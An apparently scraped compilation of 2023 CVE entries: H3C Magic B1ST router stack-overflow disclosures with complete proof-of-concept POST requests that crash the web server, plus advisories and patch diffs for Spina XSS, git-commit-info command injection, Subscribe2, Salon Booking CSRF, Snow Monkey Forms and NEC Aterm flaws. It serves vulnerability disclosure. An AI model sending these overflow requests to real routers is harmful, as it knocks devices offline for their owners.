A stack overflow in the Edit_BasicSSID function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is Edit_BasicSSID, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v33 on the stack. The parameter %[^;] of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=Edit\_BasicSSID&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;

**Result**

the process webs restart

CVE-2023-34928: vuln/H3C_B1STW/CVE-2023-34928.md at main · h4kuy4/vuln

A stack overflow in the UpdateWanMode function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is UpdateWanMode, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v6 on the stack. The parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=UpdateWanMode&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**Result**

the process webs restart

CVE-2023-34932: vuln/H3C_B1STW/CVE-2023-34932.md at main · h4kuy4/vuln

A stack overflow in the AddMacList function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is AddMacList, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v12 on the stack. The parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=AddMacList&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;;;;

**Result**

the process webs restart

CVE-2023-34929: vuln/H3C_B1STW/CVE-2023-34929.md at main · h4kuy4/vuln

Cross-site Scripting (XSS) - Stored in GitHub repository spinacms/spina prior to 2.15.1.

Expand Up

@@ -40,7 +40,7 @@

<% end %>

<% if @page.deletable? %>

<%= button\_to t('spina.pages.delete'), helpers.spina.admin\_page\_path(@page), method: :delete, class: "block w-full text-left px-4 py-2 text-sm leading-5 font-medium text-red-500 cursor-pointer bg-white hover:bg-red-100 hover:bg-opacity-50 hover:text-red-500 focus:outline-none focus:bg-gray-100 focus:text-gray-900", form: {data: {controller: "confirm", confirm\_message: t('spina.pages.delete\_confirmation', subject: @page.title)}} %>

<%= button\_to t('spina.pages.delete'), helpers.spina.admin\_page\_path(@page), method: :delete, class: "block w-full text-left px-4 py-2 text-sm leading-5 font-medium text-red-500 cursor-pointer bg-white hover:bg-red-100 hover:bg-opacity-50 hover:text-red-500 focus:outline-none focus:bg-gray-100 focus:text-gray-900", form: {data: {controller: "confirm", confirm\_message: t('spina.pages.delete\_confirmation', subject: sanitize(@page.title))}} %>

<% else %>

<span class\="block px-4 py-2 text-sm leading-5 text-gray-400"\><%=t 'spina.pages.cannot\_be\_deleted' %></span\>

<% end %>

Expand Down

CVE-2023-3445: Sanitiez title (#1258) · SpinaCMS/Spina@9adfe7b

A time-of-check to time-of-use issue exists in io_uring subsystem's IORING_OP_CLOSE operation in the Linux kernel's versions 5.6 - 5.11 (inclusive), which allows a local user to elevate their privileges to root. Introduced in b5dba59e0cf7e2cc4d3b3b1ac5fe81ddf21959eb, patched in 9eac1904d3364254d622bf2c771c4f85cd435fc2, backported to stable in 788d0824269bef539fe31a785b1517882eafed93.

CVE-2023-1295

Directory traversal vulnerability in Snow Monkey Forms versions v5.1.0 and earlier allows a remote unauthenticated attacker to delete arbitrary files on the server.

Published:2023/06/27  Last Updated:2023/06/27

**Overview**

WordPress Plugin "Snow Monkey Forms" provided by Monkey Wrench Inc. contains a directory traversal vulnerability.

**Products Affected**

*   Snow Monkey Forms versions v5.1.0 and earlier

**Description**

WordPress Plugin "Snow Monkey Forms" provided by Monkey Wrench Inc. contains a directory traversal vulnerability (CWE-22).

**Impact**

Arbitrary files on the server may be deleted by a remote attacker.

**Solution**

**Update the plugin**  
Update the plugin according to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:N/AC:L/Au:N/C:N/I:P/A:N

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Comment**

This analysis assumes that an attacker removes a file outside the web contents area.

**Credit**

Shinsaku Nomura of Bitforest Co.,Ltd. reported this vulnerability to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2023-32623: WordPress Plugin "Snow Monkey Forms" vulnerable to directory traversal

Versions of the package git-commit-info before 2.0.2 are vulnerable to Command Injection such that the package-exported method gitCommitInfo () fails to sanitize its parameter commit, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands once they control the hash content.

Expand Up

@@ -20,6 +20,7 @@ export interface GitCommitInfoResult {

}

  

const regex \= /\\s+(\[\\s\\S\]\*)/g; // matches everything after the first whitespace

const hashRegex \= /^\[0-9a-f\]{7,40}$/;

  

const gitCommitInfo \= (options: GitCommitInfoOptions \= {}): GitCommitInfoResult \=> {

const {

Expand All

@@ -29,6 +30,10 @@ const gitCommitInfo = (options: GitCommitInfoOptions = {}): GitCommitInfoResult

const thisCommit \= commit || '';

const thisPath \= path.resolve(cwd);

  

if ((thisCommit && !(new RegExp(hashRegex).test(thisCommit)))) {

return { error: new Error('Not a valid commit hash') };

}

  

if (!isGit(thisPath)) {

return {};

}

Expand Down

CVE-2023-26134: Fix: validate commit hashes before executing them | closes #24 · JPeer264/node-git-commit-info@f7c491e

The Subscribe2 plugin for WordPress is vulnerable to unauthorized access to email functionality due to a missing capability check when sending test emails in versions up to, and including, 10.40. This makes it possible for author-level attackers to send emails with arbitrary content and attachments to site users.

1<?php2if ( ! function\_exists( 'add\_action' ) ) {3        exit();4}56global $current\_user;78$s2\_admin \= ! empty( $\_POST\['s2\_admin'\] ) ? sanitize\_key( $\_POST\['s2\_admin'\] ) : '';910// was anything POSTed?11if ( 'mail' \=== $s2\_admin ) {12        if ( ! current\_user\_can( 'manage\_options' ) ) {13                die( '<p>' . esc\_html\_\_( 'Security error! You are not able to send email.', 'subscribe2' ) . '</p>' );14        }1516        if ( ! isset( $\_REQUEST\['\_wpnonce'\] ) || ! wp\_verify\_nonce( sanitize\_key( $\_REQUEST\['\_wpnonce'\] ), 'subscribe2-write\_subscribers' . S2VERSION ) ) {17                die( '<p>' . esc\_html\_\_( 'Security error! Your request cannot be completed.', 'subscribe2' ) . '</p>' );18        }1920        $subject \= html\_entity\_decode( stripslashes( wp\_kses( $this\->substitute( $\_POST\['subject'\] ), '' ) ), ENT\_QUOTES );21        $body    \= wpautop( $this\->substitute( stripslashes( $\_POST\['content'\] ) ), true );22        if ( '' !== $current\_user\->display\_name || '' !== $current\_user\->user\_email ) {23                $this\->myname  \= html\_entity\_decode( $current\_user\->display\_name, ENT\_QUOTES );24                $this\->myemail \= $current\_user\->user\_email;25        }26        if ( isset( $\_POST\['send'\] ) ) {27                if ( 'confirmed' \=== $\_POST\['what'\] ) {28                        $recipients \= $this\->get\_public();29                } elseif ( 'unconfirmed' \=== $\_POST\['what'\] ) {30                        $recipients \= $this\->get\_public( 0 );31                } elseif ( 'public' \=== $\_POST\['what'\] ) {32                        $confirmed   \= $this\->get\_public();33                        $unconfirmed \= $this\->get\_public( 0 );34                        $recipients  \= array\_merge( (array) $confirmed, (array) $unconfirmed );35                } elseif ( is\_numeric( $\_POST\['what'\] ) ) {36                        $category   \= intval( $\_POST\['what'\] );37                        $recipients \= $this\->get\_registered( "cats=$category" );38                } elseif ( 'all\_users' \=== $\_POST\['what'\] ) {39                        $recipients \= $this\->get\_all\_registered();40                } elseif ( 'all' \=== $\_POST\['what'\] ) {41                        $confirmed   \= $this\->get\_public();42                        $unconfirmed \= $this\->get\_public( 0 );43                        $registered  \= $this\->get\_all\_registered();44                        $recipients  \= array\_merge( (array) $confirmed, (array) $unconfirmed, (array) $registered );45                } else {46                        $recipients \= $this\->get\_registered();47                }48        } elseif ( isset( $\_POST\['preview'\] ) ) {49                global $user\_email;50                $recipients\[\] \= $user\_email;51        }5253        $uploads \= array();54        if ( ! empty( $\_FILES ) ) {55                foreach ( $\_FILES\['file'\]\['name'\] as $key \=> $value ) {56                        if ( 0 \=== $\_FILES\['file'\]\['error'\]\[ $key \] ) {57                                $file \= array(58                                        'name'     \=> $\_FILES\['file'\]\['name'\]\[ $key \],59                                        'type'     \=> $\_FILES\['file'\]\['type'\]\[ $key \],60                                        'tmp\_name' \=> $\_FILES\['file'\]\['tmp\_name'\]\[ $key \],61                                        'error'    \=> $\_FILES\['file'\]\['error'\]\[ $key \],62                                        'size'     \=> $\_FILES\['file'\]\['size'\]\[ $key \],63                                );6465                                $uploads\[\] \= wp\_handle\_upload(66                                        $file,67                                        array(68                                                'test\_form' \=> false,69                                        )70                                );71                        }72                }73        }74        $attachments \= array();75        if ( ! empty( $uploads ) ) {76                foreach ( $uploads as $upload ) {77                        if ( ! isset( $upload\['error'\] ) ) {78                                $attachments\[\] \= $upload\['file'\];79                        } else {80                                $upload\_error \= $upload\['error'\];81                        }82                }83        }8485        if ( empty( $body ) ) {86                $error\_message \= \_\_( 'Your email was empty', 'subscribe2' );87                $success       \= false;88        } elseif ( isset( $upload\_error ) ) {89                $error\_message \= $upload\_error;90                $success       \= false;91        } else {92                $success       \= $this\->mail( $recipients, $subject, $body, 'html', $attachments );93                $error\_message \= \_\_( 'Check your settings and check with your hosting provider', 'subscribe2' );94        }9596        if ( $success ) {97                if ( isset( $\_POST\['preview'\] ) ) {98                        $message \= '<p class="s2\_message">' . \_\_( 'Preview message sent!', 'subscribe2' ) . '</p>';99                } elseif ( isset( $\_POST\['send'\] ) ) {100                        $message \= '<p class="s2\_message">' . \_\_( 'Message sent!', 'subscribe2' ) . '</p>';101                }102        } else {103                global $phpmailer;104105                $mailer\_error \= ! empty( $phpmailer\->ErrorInfo ) ? $phpmailer\->ErrorInfo : '';106                $message      \= '<p class="s2\_error">' . \_\_( 'Message failed!', 'subscribe2' ) . '</p>' . $error\_message . $mailer\_error;107        }108109        echo '<div id="message" class="' . ( $success ? 'updated' : 'error' ) . '"><strong><p>' . wp\_kses\_post( $message ) . '</p></strong></div>' . "\\r\\n";110}111112// show our form113echo '<div class="wrap">';114echo '<h1>' . esc\_html\_\_( 'Send an email to subscribers', 'subscribe2' ) . '</h1>' . "\\r\\n";115echo '<form method="post" enctype="multipart/form-data">' . "\\r\\n";116117wp\_nonce\_field( 'subscribe2-write\_subscribers' . S2VERSION );118119$body \= ! empty( $\_POST\['content'\] ) ? esc\_textarea( $\_POST\['content'\] ) : '';120if ( isset( $\_POST\['subject'\] ) ) {121        $subject \= stripslashes( esc\_html( $\_POST\['subject'\] ) );122} else {123        $subject \= \_\_( 'A message from', 'subscribe2' ) . ' ' . html\_entity\_decode( get\_option( 'blogname' ), ENT\_QUOTES );124}125126echo '<p>' . esc\_html\_\_( 'Subject', 'subscribe2' ) . ': <input type="text" size="69" name="subject" value="' . esc\_attr( $subject ) . '" /> <br><br>';127echo '<textarea rows="12" cols="75" name="content">' . $body . '</textarea>';128echo "<br><div id=\\"upload\_files\\"\><input type=\\"file\\" name=\\"file\[\]\\" onChange=\\"remove\_selected\_image()\\"\></div>\\r\\n";129echo '<input type="button" class="button-secondary" name="addmore" value="' . esc\_attr( \_\_( 'Add More Files', 'subscribe2' ) ) . "\\" onClick=\\"add\_file\_upload();\\" />\\r\\n";130echo "<br><br>\\r\\n";131echo esc\_html\_\_( 'Recipients:', 'subscribe2' ) . ' ';132$this\->display\_subscriber\_dropdown( apply\_filters( 's2\_subscriber\_dropdown\_default', 'registered' ), false );133echo '<input type="hidden" name="s2\_admin" value="mail" />';134echo '<p class="submit"><input type="submit" class="button-secondary" name="preview" value="' . esc\_attr( \_\_( 'Preview', 'subscribe2' ) ) . '" />&nbsp;<input type="submit" class="button-primary" name="send" value="' . esc\_attr( \_\_( 'Send', 'subscribe2' ) ) . '" /></p>';135echo '</form></div>' . "\\r\\n";136echo '<div style="clear: both;"><p>&nbsp;</p></div>';137?>138<script type="text/javascript">139    //<!\[CDATA\[140    function add\_file\_upload() {141        const fileUploadContainer = document.getElementById('upload\_files'),142            fileNode = document.createElement('input'),143            spanNode = document.createElement('span'),144            lineBreak = document.createElement('br');145146        // Insert multiple file.147        if (!Boolean(fileNode.value)) {148            fileNode.type = 'file';149            fileNode.name = 'file\[\]';150            spanNode.classList.add('dashicons', 'dashicons-no-alt');151            spanNode.style.marginTop = '4px';152153            fileUploadContainer.appendChild(lineBreak);154            fileUploadContainer.appendChild(fileNode);155            fileUploadContainer.appendChild(spanNode);156        }157158        // Remove uploaded image if selected otherwise remove field.159        spanNode.addEventListener('click', function () {160            if (Boolean(fileNode.value)) {161                fileNode.value = '';162                return;163            }164165            fileNode.remove();166            spanNode.remove();167            lineBreak.remove();168        });169    }170171    // Handle first selected image.172    function remove\_selected\_image() {173        const fileUploadContainer = document.getElementById('upload\_files'),174            firstFile = fileUploadContainer.getElementsByTagName('input')\[0\],175            spanNode = document.createElement('span');176177        if (!Boolean(firstFile.nextSibling)) {178            spanNode.style.marginTop = '4px';179            spanNode.classList.add('dashicons', 'dashicons-no-alt');180            firstFile.after(spanNode);181        }182183        spanNode.addEventListener('click', function () {184            firstFile.value = '';185            this.remove();186        });187    }188    //\]\]>189</script>190<?php191require ABSPATH . 'wp-admin/admin-footer.php';192// just to be sure193die;

CVE-2023-1844: send-email.php in subscribe2/trunk/admin – WordPress Plugin Repository

The Salon Booking System plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.4.6. This is due to missing or incorrect nonce validation on the 'save_customer' function. This makes it possible for unauthenticated attackers to change the admin role to customer or change the user meta to arbitrary values via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.

Timestamp:

06/27/2023 11:32:24 AM (15 hours ago)

wordpresschef

Message:

Update trunk - version 8.4.8  

Location:

salon-booking-system/trunk

Files:

  

*   readme.txt (2 diffs)
*   salon.php (2 diffs)
*   src/SLN/Admin/Customers.php (1 diff)
*   views/admin/\_customer.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **salon-booking-system/trunk/readme.txt**
    
    r2931279
    
    r2931406
    
     
    
    5
    
    5
    
    Tested up to: 6.1
    
    6
    
    6
    
    Requires PHP: 7.4.8
    
    7
    
     
    
    Stable tag: 8.4.7
    
     
    
    7
    
    Stable tag: 8.4.8
    
    8
    
    8
    
    License: GPLv2 or later
    
    9
    
    9
    
    License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    344
    
    344
    
    \== Changelog ==
    
    345
    
    345
    
     
    
    346
    
    27.06.2023
    
     
    
    347
    
     
    
    348
    
    \* Fix vulnerability issue
    
     
    
    349
    
    346
    
    350
    
    23.06.2023
    
    347
    
    351
    
*   **salon-booking-system/trunk/salon.php**
    
    r2931279
    
    r2931406
    
     
    
    4
    
    4
    
    Plugin Name: Salon Booking Wordpress Plugin - Free Version
    
    5
    
    5
    
    Description: Let your customers book you services through your website. Perfect for hairdressing salons, barber shops and beauty centers.
    
    6
    
     
    
    Version: 8.4.7
    
     
    
    6
    
    Version: 8.4.8
    
    7
    
    7
    
    Plugin URI: http://salonbookingsystem.com/
    
    8
    
    8
    
    Author: Salon Booking System
    
    …
    
    …
    
     
    
    42
    
    42
    
    define('SLN\_PLUGIN\_DIR', untrailingslashit(dirname(\_\_FILE\_\_)));
    
    43
    
    43
    
    define('SLN\_PLUGIN\_URL', untrailingslashit(plugins\_url('', \_\_FILE\_\_)));
    
    44
    
     
    
    define('SLN\_VERSION', '8.4.6');
    
     
    
    44
    
    define('SLN\_VERSION', '8.4.8');
    
    45
    
    45
    
    define('SLN\_STORE\_URL', 'https://salonbookingsystem.com');
    
    46
    
    46
    
    define('SLN\_AUTHOR', 'Salon Booking');
    
*   **salon-booking-system/trunk/src/SLN/Admin/Customers.php**
    
    r2779160
    
    r2931406
    
     
    
    67
    
    67
    
    68
    
    68
    
        private function save\_customer($user\_id) {
    
     
    
    69
    
            check\_admin\_referer('sln\_update\_user\_'.$user\_id);
    
    69
    
    70
    
            $customer = \[\];
    
    70
    
    71
    
            $email = isset($\_POST\['sln\_customer\_meta'\]\['\_sln\_email'\]) ? sanitize\_email( wp\_unslash($\_POST\['sln\_customer\_meta'\]\['\_sln\_email'\]) ) : false;
    
*   **salon-booking-system/trunk/views/admin/\_customer.php**
    
    r2920616
    
    r2931406
    
     
    
    28
    
    28
    
    29
    
    29
    
            <input type="hidden" name="id" id="id" value="<?php echo $customer->getId(); ?>">
    
     
    
    30
    
            <?php wp\_nonce\_field('sln\_update\_user\_'. ($customer->isEmpty() ? 0 : $customer->getId())); ?>
    
    30
    
    31
    
                <div class="sln-box sln-box--main">
    
    31
    
    32
    
                    <div class="row">
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2023-3427: Changeset 2931406 for salon-booking-system – WordPress Plugin Repository

Improper Limitation of a Pathname to a Restricted Directory vulnerability in NEC Corporation Aterm WG2600HP2, WG2600HP, WG2200HP, WG1800HP2, WG1800HP, WG1400HP, WG600HP, WG300HP, WF300HP, WR9500N, WR9300N, WR8750N, WR8700N, WR8600N, WR8370N, WR8175N and WR8170N all versions allows a attacker to obtain specific files in the product.

**Multiple vulnerabilities in Aterm series**

Number:NV23-007  
CVE:CVE-2023-3330, CVE-2023-3331, CVE-2023-3332, CVE-2023-3333  
JVN:JVN#38343415  

**Overview**

CVE-2023-3330: File Viewing Vulnerability.  
CVE-2023-3331: File deletion vulnerability.  
CVE-2023-3332: An attacker who has obtained high privileges can execute arbitrary scripts.  
CVE-2023-3333: An attacker who has obtained high privileges can execute arbitrary OS commands as root.

**Products Affected**

**Aterm**

**Affected Version**

All versions listed below  

*   WG2600HP2
*   WG2600HP
*   WG2200HP
*   WG1800HP2
*   WG1800HP
*   WG1400HP
*   WG600HP
*   WG300HP
*   WF300HP
*   WR9500N
*   WR9300N
*   WR8750N
*   WR8700N
*   WR8600N
*   WR8370N
*   WR8175N
*   WR8170N

**Solution**

**References**

**Credit**

reported by Mr. Taizoh Tsukamoto in Mitsui Bussan Secure Directions, Inc. through IPA.

**Update**

2023/07/03

Update Products Affected and References.

2023/06/27

First edition.

Source

CVE